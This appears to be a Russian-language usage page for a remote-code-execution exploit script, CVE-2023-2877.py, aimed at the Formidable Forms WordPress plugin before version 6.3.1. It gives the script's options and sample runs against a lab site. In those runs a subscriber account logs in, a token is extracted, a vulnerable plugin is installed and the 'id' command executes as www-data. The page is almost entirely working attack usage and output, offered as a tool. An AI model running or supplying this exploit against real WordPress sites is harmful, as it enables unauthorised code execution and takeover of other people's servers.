
Formidable Forms < 6.3.1 - Subscriber+ Удаленное выполнение кода
Formidable Forms < 6.3.1 - Удаленное выполнение кода для подписчиков и выше
usage: CVE-2023-2877.py [-h] -w URL -u USERNAME -p PASSWORD [-pl PLUGIN] [-c CMD]
CVE-2023-2877 - Formidable Forms < 6.3.1 - Скрипт удаленного выполнения кода для подписчиков и выше
options:
-h, --help показать это справочное сообщение и выйти
-w URL, --url URL URL сайта WordPress
-u USERNAME, --username USERNAME
Имя пользователя WordPress
-p PASSWORD, --password PASSWORD
Пароль WordPress
-pl PLUGIN, --plugin PLUGIN
Другой плагин для установки, например mstore-api.3.9.0.zip
-c CMD, --cmd CMD Значение команды
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1
Успешный вход.
Токен извлечен: 15157e0f4740e9d1bbccdc5edbef1292943daf7d064637de094b2af2e9364ee9262f985d41d1658d90f1387800d09e8269a93f6397333e61c13240ababb4648d
Плагин успешно установлен.
Теперь запустите эксплойт с --cmd / -c и командой.
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1 -c id
Данные:
[['uid=33(www-data) gid=33(www-data) groups=33(www-data)']]
НЕОБХОДИМО УДАЛИТЬ УЯЗВИМЫЙ ПЛАГИН User Post Gallery, так как он не имеет аутентификации!